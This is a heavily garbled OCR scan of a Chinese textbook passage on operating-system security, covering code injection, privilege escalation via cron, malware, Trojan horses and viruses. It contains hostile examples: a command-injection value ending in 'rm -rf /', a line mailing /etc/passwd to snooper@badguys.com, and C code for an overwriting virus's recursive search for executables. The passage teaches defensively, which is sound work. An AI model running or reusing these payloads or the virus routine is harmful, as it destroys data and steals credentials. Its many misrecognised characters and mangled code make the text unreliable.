候 需 要 将 用 户 文件 以 其 他 文件 名 另存 〈 如 为 了 备份 ) 。 如 果 程 序 员 为 
了 减轻 工作 量 而 直接 调用 系统 函数 ， 开 启 一 个 shell 并 执行 shell 命 令 。 如 
下 的 C 代 码 


System("ls>file-list") 


开启 shell， 并 执行 命令 


1ls>file-list 


列 出 当前 目 孙 下 的 文件 列表 ， 将 其 复制 到 叫做 fierlist 的 目 未 下。 
如 上 面 所 说 ， 程 序 员 写 的 代码 可 能 如 图 9-26 所 示 。 


int main(int argc, char *argv[]) 


char src[100], dst[100], cmd[205] = "cp "; 上 * 声明 3 个 字符 数组 */ 
printf("Please enter name of source file: "); F 提示 输入 源 文件 名 
gets(src); 六 从 键盘 获取 输入 信息 */ 
strcat(cmd, src); 六 把 输入 信息 连接 在 "cp" 后 面 */ 


strcat(cmd, " "); 上 六 在 cmd 末 尾 加 入 一 个 空格 % 
printf("Please enter name of destination file: "); /* 提示 输入 目的 文件 名 */ 
gets(dst); 广 从 键盘 获取 输入 信息 */ 
strcat(cmd, dst); 上 六 构造 完整 的 cmd*/ 
system(cmd); 广 执 行 复制 命令 */ 


图 9-26 可 能 导致 代码 注入 攻击 的 程序 


该 程序 的 功能 是 输入 源 和 目的 文件 名 后 ， 用 cp 命令 产生 一 条 命 
令 ， 最 后 调用 system 执 行 这 条 命令 。 如 采用 户 分 别 输入 “abc" 和 “xyz”， 


产生 的 作 令 为 : 


Cp abc xyz 


它 确 实 是 在 复制 文件 。 
不 笠 的 是 ， 这 段 代 码 在 有 一 个 巨大 的 安全 漏洞 ， 可 以 用 代码 注入 
方法 进行 攻击 。 假 如 用 户 输入 “abc” 和 “xyz;rm-rf”， 命 令 就 变 成 了 : 


Cp abc xyz;rm-rf/ 


先 复 制 文件 ， 然 后 了 递归 地 删除 整个 文件 系统 中 所 有 文件 和 文件 
夹 。 如 果 该 程序 以 系统 管理 员 权限 运行 ， 此 命令 就 会 完全 执行 。 问 题 
的 关键 在 于 ， 分 号 后 的 字符 都 会 命令 的 方式 在 shell 中 执行 。 


输入 参数 男 一 个 构造 例子 可 以 是 “xyz;mail snooper@badguys.com 


</etc/passwd”， 产 生 如 下 命令 : 


Cp abc xyz;mail snooper@badguys.com< /etc/passwd 


将 etc 目 录 下 passwd 文 件 发送 到 了 一 个 不 可 信 的 邮箱 中 了 。 


9.6.6 ”权限 提升 攻击 


另 一 类 攻击 叫做 权限 提升 攻击 (privilege escalation attack) ， 即 攻 
击 者 其 骄 系统 为 其 赋予 比 正常 情况 下 更 高 的 权限 (一 般 情况 下 攻击 者 
都 希望 获取 超级 用 户 权 限 ) 。 比 较 著 名 的 例子 是 利用 计划 任务 (cron 
daemon) 进行 攻击 。cron daemon 帮 助 用 户 每 隔 固 定 的 时 间 进 行 工 作 
(每 个 小 时 、 每 天 、 每 周 等 ) 。cron daemon 通 常 都 运行 在 root 权 限 
下 ， 以 便 可 以 访问 任何 用 户 的 文件 。 它 有 一 个 目录 专门 存放 一 系列 指 
令 ， 来 完成 用 户 计 划 的 一 系列 工作 。 当 然 该 目录 不 能 被 用 户 修 改 ， 否 
则 任何 人 都 可 以 利用 root 权 限 做 任何 事情 了 。 


攻击 过 程 如 下 : 攻击 者 的 程序 将 其 目录 设 定 为 cron daemon 的 工作 
目录 ， 此 时 该 程序 并 不 能 对 此 目录 进行 修改 ， 不 过 这 并 不 会 对 攻击 有 
任何 影响 。 该 程序 接 下 来 将 引发 一 次 系统 故障 ， 或 者 直接 将 目 己 的 进 
程 结束 ， 从 而 强制 产生 一 次 内 存 信息 转 储 (core dump) 。 信 息 转 储 是 
由 操作 系统 在 cron daemon 目 录 下 引发 的 ， 因 此 不 会 被 系统 保护 机 制 所 
阻止 。 攻 击 者 程序 的 内 存 映 像 因此 被 合法 地 加 入 到 cron daemon 的 命令 
行 中 ， 接 下 来 将 会 在 root 权 限 下 被 执行 。 首 移 该 程序 会 将 攻击 者 指定 
的 茶 些 程序 提升 为 SETUID root 权 限 ， 第 二 部 则 是 运行 这 些 程序 。 当 然 
这 种 攻击 方式 现在 已 经 行 不 通 了 ， 不 过 这 个 例子 可 以 帮助 读者 了 解 这 
类 攻击 的 大 致 过 程 。 


9.7 ”恶意 软件 


在 2000 年 之 前 出 生 的 年 轻 人 有 时 候 为 了 打发 无 聊 的 时 间 ， 会 编写 
些 有 恶意 软件 发 布 到 网 络 上 ， 当 然 他 们 的 目的 只 是 为 了 娱乐 。 这 样 的 
软件 “包括 木 马 、 病 毒 和 蠕虫 ) 在 世界 上 快速 地 传播 开 来 ， 并 被 统一 
称 为 恶意 软件 (malware) 。 当 报道 上 强调 某 个 恶意 软件 造成 了 数 百 万 
美元 的 损失 ， 或 者 无 数 人 丢失 了 他 们 至 贵 的 数据 ， 恶 意 软 件 的 作者 会 
惊讶 于 自己 的 编程 技艺 竟然 能 产生 如 此 大 的 影响 。 然 而 对 于 他 们 来 
说 ， 这 只 不 过 是 一 次 屎 作 剧 而 已 ， 并 不 涉及 任何 利益 关系 。 


然而 这 样 天 真 的 时 代 已 经 过 去 了 ， 现 在 的 恶意 软件 都 是 由 组 织 严 
密 的 犯罪 集团 编写 的 ， 他 们 所 做 的 一 切 只 是 为 了 钱 ， 而 且 并 不 布 望 目 
己 的 事情 被 媒体 报道 。 绝 大 多 数 这 样 的 恶意 软件 的 设计 目标 都 是 “传播 
越 快 越 好 ， 范 围 越 广 越 好 ”。 当 一 台 机 器 被 感染 ， 亚 意 软件 被 安装 ， 并 
且 癌 在 世界 某 地 的 控制 者 机 器 报告 该 机 絮 的 地 址 。 用 于 控制 的 机 絮 通 
常 都 被 设置 在 一 些 欠 发 达 的 或 法 制 宽 松 的 国家 。 在 被 感染 的 机 器 中 通 
常 都 会 安装 一 个 后 门 程序 (backdoor) ， 以 便 犯 罪 者 可 以 随时 向 该 机 器 
发 出 指令 ， 以 方便 地 控制 该 机 絮 。 以 这 种 方式 被 控制 的 机 絮 叫 做 伪 厂 
Hlas (zombie) ， 而 所 有 被 控制 的 机 器 合 起 来 称 做 僵尸 网 络 (botnet, 


是 robot network 的 缩写 ) 。 


控制 一 个 僵尸 网 络 的 徘 犯 可 能 处 于 恶意 的 目的 〈 通 常 是 商业 目 
的 ) 将 这 个 网 络 租借 出 去 。 最 通常 的 一 种 是 利用 该 网 络 发 送 商 业 垃 圾 
邮件 。 当 一 次 二 圾 邮件 的 攻击 在 网 上 爆发 ， 警 方 介入 并 试图 找到 邮件 
的 来 源 ， 他 们 最 终 会 发 现 这 些 邮件 来 目 全 世界 成 和 干 上 万 台 计 算 机 ， 如 
革 警 方 继续 深入 调查 这 些 计 算 机 的 拥有 者 ， 他 们 将 会 看 到 从 孩子 到 老 
妇 的 各 色 人 物 ， 而 其 中 不 会 有 任何 人 承认 目 己 发 送 过 垃圾 邮件 。 可 见 
利用 别人 的 机 器 从 事 犯 罪 活 动 使 得 找到 幕后 黑手 成 为 一 件 困难 的 事 


情 * 


安装 在 他 人 机 器 中 的 恶意 软件 还 可 以 用 于 其 他 犯罪 活动 ， 如 惑 
索 。 想 象 一 下 ， 一 台 机 器 中 的 恶意 软件 将 磁盘 中 的 所 有 文件 都 进行 了 
加 密 ， 接 着 显示 如 下 信息 : 


GREETINGS FROM GENERAL ENCRYPTION! 


TO PURCHASE A DECRYPTION KEY FOR YOUR HARD DISK, PLEASE SEND $100 IN 
SMALL, UNMARKED BILLS TO BOX 2154, PANAMA CITY, PANAMA. THANK YOU. WE 
APPRECIATE YOUR BUSINESS. 


恶意 软件 的 另 一 个 应 用 是 在 被 感染 机 器 中 安装 一 个 记录 用 户 所 有 
敲 击 键盘 动作 的 软件 《键盘 记录 器 keylogger) ， 该 软件 每 隔 一 段 时 间 
将 记录 的 结果 发 送 给 其 他 某 台 机 器 或 一 组 机 器 〈 包 括 僵尸 机 器 ) ， 最 
终 发送 到 排 犯 手 中 。 一 些 提供 中 间接 收 和 发 送信 息 的 机 器 的 互联 网 提 
供 痢 通 澡 是 徘 犯 的 同伙 ， 但 调查 他 们 同样 困难 。 


罪犯 在 上 述 过 程 中 收集 的 键盘 敲 击 信息 中 ， 真 正 有 价值 的 是 一 些 
诸如 信用 卡 卡 号 这 样 的 信息 ， 它 可 以 通过 正当 的 商业 途径 来 购买 东 
西 。 受 害 者 可 能 知道 还 款 期 才能 发 现 他 的 信用 卡 已 经 被 盗 ， 而 此 时 犯 
徘 分 子 已 经 用 这 张 卡 道 遥 度 过 了 几 天 甚至 几 个 星期 。 


为 了 防止 这 类 犯 徘 ， 信 用 卡 公司 都 采取 人 工 稚 能 软件 检测 茶 次 不 
同 寻 利 的 消费 行为 。 例 如 ， 如 采 一 个 人 通 闻 情况 下 只 会 在 本 地 的 小 商 
店 中 使 用 他 的 信用 卡 ， 而 某 一 天 它 突然 预订 了 很 多 台 昂 贯 的 笔记 本 电 
脑 并 要 求 将 他 们 发 送 到 塔吉克 斯 坦 的 某 个 地 址 。 这 时 信用 卡 公司 的 
报 会 啊 起 ， 员 工会 与 信用 卡 拥有 者 进行 联系 ， 以 确认 这 次 交易 。 当 然 
犯罪 分 子 也 知道 这 种 防御 软件 ， 因 此 他 们 会 试图 调整 目 己 的 消费 习 
惯 ， 并 力图 避 开 系统 的 检测 。 
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在 僵尸 机 器 上 安装 的 其 他 软件 可 以 搜集 另外 一 些 有 用 的 信息 ， 这 
些 信息 与 键盘 记录 其 搜集 的 信息 结合 起 来 ， 可 能 使 得 犯罪 分 子 从 事 更 
加 广泛 的 身份 盗窃 (identity theft) 犯罪 。 罪 犯 搜集 了 一 个 人 足够 的 信 
轧 ， 如 他 的 生日 、 母 亲 出 嫁 前 的 姓名 、 社 会 安全 码 、 银 行 账号 、 密 码 
等 ， 因 此 可 以 成 功 地 模仿 受害 着 ， 并 得 到 新 的 实物 文档 ， 如 笠 换 光驱 
执照 、 银 行 签 账 卡 (bank debit card) 、 出 生 证 明 等 。 这 些 信息 可 能 被 
卖 给 其 他 排 犯 ， 从 而 从 事 更 多 犯罪 活动 。 


利用 恶意 软件 从 事 的 男 一 种 犯罪 是 贸 取 用 户 账户 中 的 财产 ， 该 类 
恶意 软件 平时 一 直 处 在 光伏 状态 ， 直 到 用 户 正 确 地 登录 到 他 的 网 络 银 


行 账户 中 去 ， 该 软件 立刻 发 起 一 次 快速 的 交易 ， 碍 看 该 账户 有 多 少 余 
额 ， 并 将 所 有 的 钱 都 转 到 罪犯 的 账户 中 ， 这 笔 钱 接着 连续 转移 很 多 个 
账户 ， 以 便 和 警方 在 追踪 现金 流 走 向 的 时 候 需 要 花 很 多 天 甚至 儿 个 星期 
来 获得 查看 账户 的 相关 许可 。 这 种 犯罪 通 弟 设计 很 大 的 交易 量 ， 已 经 
不 能 视 为 青少年 的 恶作剧 了 。 


恶意 软件 不 只 会 被 有 组 织 的 犯罪 团伙 所 使 用 ， 在 工业 生产 中 同样 
叮 以 看 到 其 身影 。 一 个 公司 可 能 会 向 对 手 的 工厂 中 安装 一 些 恶 意 软 
件 ， 当 这 些 恶 意 软件 检测 到 没有 管理 员 人 处 于 登录 状态 时 ， 便 会 运行 并 
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烦 。 而 在 其 他 情况 下 这 类 恶意 软件 不 会 做 任何 事情 ， 因 此 难以 被 检测 
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被 投放 在 局 域 网 中 ， 并 且 会 检测 它 是 否 在 总 裁 的 计算 机 中 运行 ， 如 果 
征 ， 则 找到 其 中 的 电子 报表 ， 并 随机 交换 两 个 单元 格 的 内 容 。 而 总 裁 
迟早 会 基于 这 份 错误 的 报表 做 出 不 正确 的 决定 ， 到 时 等 待 他 的 束 是 被 
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些 人 无论 走 到 哪里 肩 腾 上 都 会 有 一 个 心 片 请 不 要 与 肩膀 上 的 
RFID 改 片 弄 混 ) 。 他 们 对 社会 充满 了 或 真实 或 想象 中 的 怨恨 ， 想 要 进 
行 报复 。 此 时 他 们 可 能 会 选择 恶意 软件 。 很 多 现代 计算 机 将 BIOS 保 存 
在 内 存 中 ， 内 存 可 以 在 程序 的 控制 下 被 重 写 (以 便 生产 者 可 以 方便 地 


修正 其 错误 ) 。 亚 意 软 件 向 内 存 中 随机 地 写 入 垃圾 数据 ， 使 得 电脑 无 
法 启动 。 如 果 内 存在 电脑 插 槽 中 ， 那 么 修复 这 个 问题 需要 将 电脑 打 
开 ， 并 且 换 一 个 新 的 内 存 ， 如 来 内 存 被 焊接 在 母 板 上 ， 可 能 整 块 母 板 
都 可 能 作废 ， 不 得 不 买 一 块 新 的 母 板 。 


我 们 不 打算 继续 深入 地 讨论 这 个 问题 ， 读 着 到 这 里 已 经 了 解 天 于 
恶意 软件 的 基本 情况 ， 如 果 想 了 解 更 多 内 容 ， 请 在 搜索 引擎 中 输入 “ 恶 
意 软 件 ”。 


很 多 人 会 问 : “为 什么 恶意 软件 会 如 此 容易 地 传播 开 来 ? ”产生 这 
种 情况 的 原因 有 很 多 。 其 中 之 一 是 世界 上 909% 的 计算 机 运行 的 是 单一 版 
本 的 操作 系统 (Windows) ， 使 得 它 成 为 一 个 非常 容易 被 攻击 的 目标 。 
假设 每 台 计 算 机 部 有 10 个 操作 系统 ， 其 中 每 个 操作 系统 占有 市 场 的 
10%， 那 么 传播 恶意 代码 束 会 变 得 加 倍 的 困难 。 这 束 好 比 在 生物 世界 
中 ， 物 种 多 样 化 可 以 有 效 防 止 生物 灭绝 。 


第 二 个 原因 是 ， 微 软 在 很 早 以 前 就 强调 其 Windows 操 作 系统 对 于 没 
有 计算 机 专业 知识 的 人 而 言 是 简单 易 用 的 。 例 如 Windows 人 允许 设置 在 没 
有 密码 的 情况 下 登录 ， 而 UNIX 从 诞生 之 初 就 始终 要 求 登录 密码 (尽管 
随 着 Linux 不 断 试图 向 Windows 靠 近 ， 这 种 传统 正在 逐步 地 淡化 ) ， 操 
作 系 统 易 用 性 是 微软 一 贯 坚 持 的 市 场 策略 ， 因 此 他 们 在 安全 性 与 易 用 
性 之 间 不 断 进 行 着 权衡 。 如 果 读 者 认为 安全 性 更 加 重要 ， 那 么 请 先 停 
止 阅读 ， 在 用 你 的 手机 打 电 话 之 前 先 为 它 注册 一 个 PIN 码 一 一 几乎 所 有 


的 手机 都 有 此 功能 。 如 采 你 不 知道 如 何 去 做 ， 那 么 请 从 生产 商 的 网 站 
下 载 用 户 手册 。 


在 下 面 的 几 节 中 我 们 将 会 看 到 恶意 软件 更 为 一 般 化 的 形式 ， 读 者 
将 会 看 到 这 些 软件 是 如 何 组 织 并 传播 的 。 之 后 我 们 会 提供 对 恶意 软件 
的 一 些 防御 方法 。 


9.7.1 FRES 


编写 恶意 代码 是 第 一 步 ， 你 可 以 在 你 的 卧室 里 完成 这 件 事 情 。 然 
而 让 数 以 百 万 计 的 人 将 你 的 程序 安装 到 他 们 的 电脑 中 则 是 完全 不 同 的 
另 一 件 事 。 我 们 的 软件 编写 者 Mal 该 如 何 做 呢 ? 一 般 的 方法 是 编写 一 些 
有 用 的 程序 ， 并 将 恶意 代码 供 入 到 其 中 。 游 戏 、 音 乐 播放 右 、 色 情书 
刊 阅览 右 等 都 是 比较 好 的 选择 。 人 们 会 目 愿 地 下 载 并 安 狼 这 些 应 用 程 
序 。 作 为 安装 免费 软件 的 代价 ， 他 们 也 同时 安 故 了 恶意 软件 。 这 种 方 
式 叫做 木马 攻击 (Torjan horse attack) ， 引 自 希腊 人 荷 马 所 做 《奥德赛 》 
中 闭 满 了 希腊 士兵 的 木马 。 在 计算 机 安全 世界 中 ， 它 指 入 们 上 自愿 下 载 
的 软件 中 所 隐藏 的 恶意 软件 。 


当 用 户 下 载 的 程序 运行 时 ， 它 调用 函数 将 恶意 代码 写 入 磁盘 成 为 
可 执行 程序 并 局 动 该 程序 。 恶 意 代码 接 下 来 便 可 以 进行 任何 预 移 设 计 
好 的 破坏 活动 ， 如 删除 、 修 改 或 加 密 文 件 。 它 还 可 以 搜索 信用 卡号 、 
密码 和 其 他 有 用 的 信息 ， 并 且 通 过 互联 网 发 送 给 Mal。 该 恶意 代码 很 有 
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器 ， 随 时 准备 发 送 垃圾 邮件 或 完成 攻击 者 的 指示 。 通 音 情 况 下 ， 恶 意 
代码 还 包括 一 些 指 令 ， 使 得 它 在 计算 机 每 次 重新 启动 的 时 候 上 自动 启 
动 ， 这 一 点 所 有 的 操作 系统 都 可 以 做 到 。 


木马 攻击 的 美妙 之 处 在 于 ， 木 马 的 拥有 者 不 必 目 己 费 尽心 机 侵入 
到 受害 者 的 计算 机 中 ， 因 为 木马 是 由 受害 者 自己 安装 的 。 


还 有 许多 其 他 方法 引诱 受害 人 执行 特洛伊 木马 程序 。 如 ， 许 多 
UNIX 用 户 都 有 一 个 环境 变量 $PATH， 这 是 一 个 控制 查找 哪些 目录 的 命 
令 。 在 shell 程 序 中 键入 


echo $PATH 
束 可 以 查看 。 
例如 ， 用 户 ast 在 系统 上 设置 的 环境 变量 可 能 会 包括 以 下 目录 : 


:/usr/ast/bin:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/ucb: 


/usr/man\ 
:/usr/java/bin: /usr/java/lib:/usr/local/man: /usr/openwin/man 


其 他 用 户 可 能 设置 不 同 的 查找 路 径 。 当 用 户 在 shell 中 键入 


prog 


后 ，shell 会 查看 在 目录 /usr/ast/bin/prog 下 是 否 有 程序 。 如 果 有 就 执 
行 ， 如 果 没 有 ，shell 会 尝试 查 
找 /usr/local/bin/prog、/usr/bin/prog、/bin/prog， 直 到 查访 所 有 10 个 目录 
为 止 。 假 定 这 些 目 录 中 有 一 个 目录 未 被 保护 ， 骇 客 即 可 以 在 该 目录 下 
放 一 个 程序 。 如 果 在 整个 目录 列表 中 ， 该 程序 是 第 一 次 出 现 ， 就 会 被 
运行 ， 从 而 特洛伊 木马 也 被 执行 。 


大 多 数 和 常用 的 程序 都 在 /bin 或 /usr/bin 中 ， 因 此 在 /usr/bin/X11/1s 中 放 
一 个 木马 对 一 般 的 程序 而 言 不 会 起 作用 。 因 为 真 的 版 本 会 先 被 找到 。 
但 是 假设 骇 客 在 /usr/bin/X11 中 插入 了 la， 如 果 用 户 误 键入 la 而 不 是 ]s 
( 列 目录 命令 ) ， 那 么 特洛伊 木马 程序 就 会 运行 并 执行 其 功能 ， 随 后 
显示 la 并 不 存在 的 正确 信息 以 迷惑 用 户 。 通 过 在 复杂 的 目录 系统 中 插入 
特洛伊 木马 程序 并 用 人 们 易 拼 错 的 单词 作为 名 字 ， 用 户 迟 早 会 有 机 会 
误 操作 并 激活 特洛伊 木马 。 有些 人 可 能 会 是 超级 用 户 (超级 用 户 也 会 
误 操作 ) ， 于 是 特洛伊 木马 会 有 机 会 把 /binls 蔡 换 成 含有 特洛伊 木马 的 
程序 ， 这 样 就 能 在 任何 时 候 被 激活 。 


Mal， 一 个 恶意 的 但 合法 的 用 户 ， 也 可 能 为 超级 用 户 放 置 陷阱 。 他 
用 含有 特洛伊 木马 程序 的 ls 命令 更 换 了 原 有 的 版 本 ， 然 后 假装 做 一 些 秘 
密 的 操作 以 引起 超级 用 户 的 注意 ， 如 同时 打开 100 个 计算 约束 进程 。 当 
超级 用 户 键入 下 列 命令 来 查看 Mal 的 目 示 时 机 会 丈 来 了 : 


cd/home/mal 
ls-1 


既然 某 些 shell 程 序 在 通过 $PATH 工 作 之 前 会 首先 确定 当前 所 在 的 目 
录 ， 那 么 超级 用 户 可 能 会 刚刚 激活 Mal 放 置 的 特洛伊 木马。 特洛伊 木马 
可 以 把 /srmalbin/sh 的 SETUID 设 为 root。 接 着 它 执行 两 个 操作 : 用 
chown 把 msvmal/bin/sh 上 owner 改 为 root，, 然 后 用 chmod 设 置 SETUID 
位 。 现 在 Mal 仅 仅 通 过 运行 shell 就 可 以 成 为 超级 用 户 了 。 


如 条 Mal 发 现 目 己 缺 钱 ， 他 可 能 会 使 用 下 面 的 特 次 伊 木马 来 找 线 
化 。 第 一 个 方法 是 ， 特 洛 伊 木 马 程序 安装 诸如 Quicken 之 类 的 软件 检查 
受害 人 是 否 有 银行 联机 程序 ， 如 采 有 就 直接 把 受害 人 账户 里 的 钱 转 到 
一 个 用 于 存 钱 的 虚拟 账户 (特别 是 国外 账户 ) 里 。 


第 二 个 方法 是 ， 特 洛 伊 木马 首先 关闭 modem 的 声音 ， 然 后 拨打 900 
号 码 (ASB) 到 偏远 国家 ， 如 摩尔 多 瓦 〈 前 苏联 的 一 部 分 ) 。 如 
果 特 洛 伊 木 马 运行 时 用 户 在 线 ， 那 么 摩尔 多 瓦 的 900 号 码 就 成 为 该 用 户 
的 Internet 接 入 提供 者 (非常 昂贵 ， 这 样 用 户 就 不 会 发 觉 并 在 网 上 待 
上 好 几 个 小 时 。 上 述 两 种 方法 都 不 仅仅 是 假设 .它们 都 曾 发 生 并 被 
Denning (1999) 报道 过 。 关 于 后 一 种 方法 ， 曾 经 有 800 000 分 钟 连接 到 
摩尔 多 瓦 ， 直 到 美国 联邦 交易 局 断 开 连接 并 起 诉 位 于 长 岛 的 三 个 人 。 
他 们 最 后 同意 归还 38 000 个 受害 者 的 274 万 美元 。 


9.7.2 ”病毒 
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们 显然 已 经 成 为 现今 影响 个 人 和 公司 安全 的 主要 问题 。 本 市 我 们 将 介 
绍 病毒 ， 接 下 来 将 介绍 蠕虫 。 


笔者 在 撰写 本 市 时 曾 犹 泡 要 不 要 给 出 太 多 的 细 市 ， 担 心 它们 会 让 
一 些 人 产生 邪 念 。 然 而 现在 有 很 多 书籍 提供 了 更 为 详细 的 内 容 ， 有 些 
甚至 给 出 代码 (Ludwig,1998) 。 而 且 互 联网 上 也 有 很 多 病毒 方面 的 信 
忌 ， 笔 者 写 出 的 这 些 并 不 足以 构成 什么 威胁 。 男 外 ， 人 们 在 不 知道 病 
毒 工作 原理 的 情况 下 很 难 去 防御 它们 ， 而 且 关 于 病毒 的 传播 有 许多 错 
误 的 观念 需要 纠正 。 


那么 ， 什 么 是 病毒 呢 ? KEH, E (virus) 是 一 种 特殊 的 程 
序 ， 它 可 以 通过 把 自己 植 入 到 其 他 程序 中 来 进行 “ 演 殖 "， 就 像 生物 界 
中 真正 的 病毒 那样 。 除 了 震 殖 目 身 以 外 ， 病 毒 还 可 以 做 许多 其 他 的 事 
情 。 蠕 虫 很 像 病毒 ， 但 其 不 同 点 古 通 过 自己 复制 自己 来 繁殖 。 不 过 这 
不 是 我 们 关注 的 重点 ， 因 此 下 面 我 们 将 用 “病毒 "来 统称 上 面 两 种 恶意 
程序 。 有 关 里 虫 的 内 容 会 在 9.7.3 节 中 讲解 。 


1. 病 毒 工作 原理 


让 我 们 看 一 下 病毒 有 那些 种 类 以 及 它们 是 如 何 工作 的 。 病 毒 的 制 
造 者 ， 我 们 称 之 为 Virgil， 可 能 用 汇编 语言 RACHA) 写 了 一 段 很 
小 但 是 有 效 的 病毒 。 在 他 完成 这 个 病毒 之 后 ， 他 利用 一 个 叫做 dropper 
的 工具 把 病毒 插入 到 目 己 计算 机 的 程序 里 ， 然 后 让 被 感染 的 程序 迅速 
传播 。 也 许 贴 在 公告 板 上 ， 也 许 作 为 免费 软件 共享 在 mternet 上。 这 一 
程序 可 能 是 一 款 激 动人 心 的 游戏 ， 一 个 盗版 的 商业 软件 或 其 他 能 引 人 
注意 的 软件 。 随 后 人 们 就 开始 下 载 这 一 病毒 程序 。 


一 旦 病毒 程序 被 安装 到 受害 者 的 计算 机 里 ， 病 毒 就 处 于 休眠 状态 
直到 被 感染 的 程序 被 执行 。 发 作 时 ， 它 感染 其 他 程序 并 执行 自己 的 操 
作 。 通 常 ， 在 某 个 特定 日 期 之 前 病毒 是 不 执行 任何 操作 的 ， 直 到 某 一 
天 它 认为 自己 在 被 关注 前 已 被 广泛 传播 时 才 发 作 。 被 选中 的 日 期 可 能 
是 发 送 一 段 政治 信息 (如 在 病毒 编写 者 所 在 的 宗教 团体 受 导 的 100 周 年 
或 500 周 年 纪念 日 触发 ) 。 


在 下 面 的 讨论 中 ， 我 们 来 看 一 下 感染 不 同文 件 的 七 种 病毒 。 他 们 
共事 者 、 可 执行 程序 、 内 存 、 引 导语 区 、 驱 动 右 、 宏 以 及 源 代码 病 
o 点 无 疑问 ， 新 的 病毒 类 型 不 久 就 会 出 现 。 


是 
= 
2. 共 事 者 病毒 


共事 者 病毒 (companion virus) 并 不 真正 感染 程序 ， 但 当 程序 执行 
的 时 候 它 也 执行 。 下 面 的 例子 很 容易 解释 这 个 概念 。 在 MS-DOS 中 ， 当 


用 户 输入 
prog 


MS-DOS 首 先 查 找 叫 做 prog.com 的 程序 。 如 果 没 有 找到 就 查找 叫做 
prog.exe 的 程序 。 在 Windows 里 ， 当 用 户 点 击 Start (开始 ) 和 Run ( 运 
行 ) 后 ， 同 样 的 结果 会 发 生 。 现 在 大 多 数 的 程序 都 是 .exe 文 件 ，.com 文 
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假设 Virgil 知 道 许 多 人 都 在 MS-DOS 提 示 符 下 或 点 击 Windows 的 Run 
运行 prog.exe。 他 束 能 人 徐 单 地 制造 一 个 叫做 prog.com 的 病毒 ， 当 人 们 试 
图 运行 prog (除非 输入 的 是 全 名 prog.exe) 时 就 可 以 让 病毒 执行 。 当 
prog.com 完 成 了 工作 ， 病 毒 就 让 prog.exe 开 始 运 行 而 用 户 显 然 没 有 这 人 么 
聪明 。 


有 了 时候 类 似 的 攻击 也 发 生 在 Windows 操 作 系 统 的 桌面 上 ， 吕 面 上 有 
连接 到 程序 的 快捷 方式 (符号 链接 ) 。 病 毒 能 够 改变 链接 的 目标 ， 并 
指 癌 病 毒 本 身 。 当 用 户 双 击 图 标 时 ， 病 毒 束 会 运行 。 运 行 完 毕 后 ， 病 
毒 又 会 启动 正常 的 目标 程序 。 


3. 可 执行 程序 病毒 


更 复杂 的 一 类 病毒 是 感染 可 执行 程序 的 病毒 。 它 们 中 最 简单 的 一 
类 会 覆盖 可 执行 程序 ， 这 叫做 覆盖 病毒 (overwriting virus) 。 它 们 的 


感染 机 制 如 图 9-27 所 示 。 


#include <sys/types.h> /* by YE AY POSIX XCF */ 

#include <sys/stat.h> 

#include <dirent.h> 

#include <fentl.h> 

#include <unistd.h> 

struct stat sbuf; /*FlFstaci H, A sc PEE A A sym He*/ 


search(char *dir_name) 
nT UAT Be FY Fa VA AS ER 7 
DIR «dirp; FAR [al $7 A H at A FR E 
struct dirent *dp; /xX 指向 目录 项 的 指针 */ 


dirp = opendir(dir_name); 访 打 开 此 目录 */ 
if (dirp == NULL) return; 上 不 能 打开 目录 时 返回 */ 
while (TRUE aana — 
A 5 = 人 # 恋 下 一 个 目录 项 oj ge 
if (dp == NULL) { /NULL 表 示 已 完成 操作 */ 
chdir (".."); /* |b] Bi SO A ae */ 
break; PDE TEA */ 


} Pp B ge aie 

if (dp->d_name[0] == ’.’) continue; Pot A” HR" 

lstat(dp->d_name， &sbuf) /项 是 符 号 连接 吗 ? #/ 

if (S_ISLNK(sbuf.st_mode)) continue; 兴 跳 过 符号 连接 总 

if (chdir(dp->d_name) == 0) { /* ty 果 chdir 成 功 ， 则 必定 录 #/ 
search("."); /* 如 果 是 ， 进 入 目录 查 =e 

} else { MEE f 文件 )， 则 感染 */ 
if (access(dp->d_name,X_OK) == 0) /x* 如 是 可 执行 文件 就 感染 */ 

infect(dp->d_name); 


Sa /*dir 运 行 完 毕 ， 关 闭 程 序 并 返回 */ 


图 9-27 在 UNIX 系 统 上 查找 可 执行 文件 的 递归 过 程 


病毒 的 主 程序 首先 将 自己 的 二 进 制 代码 复制 到 数组 里 ， 这 是 通过 
打开 argv[0] 并 将 其 读 取 以 便 安 全 调用 来 完成 的 。 然 后 它 通 过 将 自己 
为 根 目录 来 截断 由 原来 的 根 目 隶 开始 的 整个 文件 系统 ， 将 根 目 录 作 为 
参数 调用 search 过 程 。 


递归 过 程 search 打 开 一 个 日 录 ， 每 次 使 用 readdit 命 令 逮 一 读 取 入 口 
地 址 ， 直 到 返回 值 为 NULL， 说 明 所 有 的 入 口 都 被 读 取 过 。 如 有 果 入 口 是 
目录 ， 就 将 当前 目录 改 为 该 目录 ， 继 续 递 归 调 用 search;， 如 果 入 口 是 可 
执行 文件 ， 就 调用 infect 过 程 来 感染 文件 ， 这 时 把 要 感染 的 文件 名 作为 
参数 。 以 “. ”开头 的 文件 被 跳 过 以 避免 “” 和 “..” 目 录 市 来 的 问题 。 同 时 符 
号 链接 也 被 跳 过 ， 因 为 系统 可 以 通过 chdir 系 统 调用 进入 目录 并 通过 转 
到 “..” 来 返回 ， 这 种 对 硬 连 接 成 立 ， 对 符号 链接 不 成 立 。 更 完善 的 程序 
同样 可 以 处 理 符 号 链接 。 


真正 的 感染 程序 infect (尚未 介绍 ) 仅仅 打开 在 其 参数 中 指定 的 文 
件 并 把 数组 里 存放 的 病毒 代码 复制 到 文件 里 ， 然 后 再 关闭 文件 。 


病毒 可 以 通过 很 多 种 方法 不 断 “ 改 善 ”。 第 一 ， 可 以 在 infect 里 插入 
产生 随机 数 的 测试 程序 然后 悄然 返回 。 如 调用 超过 了 128 次 病毒 就 会 感 
染 ， 这 样 殴 降低 了 病毒 在 大 范围 传播 之 前 束 被 被 检测 出 来 的 概率 。 生 
物 病毒 也 具有 这 样 的 特性 : 那些 能 够 迅速 杀 死 受害 者 的 病毒 不 如 缓慢 
发 作 的 病毒 传播 得 快 ， 慢 发 作 给 了 病毒 以 更 多 的 机 会 扩散 。 男 外 一 个 
方法 是 保持 较 高 的 感染 率 (如 25%) ， 但 是 一 次 大 量 感染 文件 会 降低 磁 
盘 性 能 ， 从 而 易于 被 发 现 。 


第 二 ，infect 可 以 检查 文件 是 否 已 被 感染 。 两 次 感染 相同 的 文件 无 
疑 是 浪费 时 间 。 第 三 ， 可 以 采取 方法 保持 文件 的 修改 时 间 及 文件 大 小 
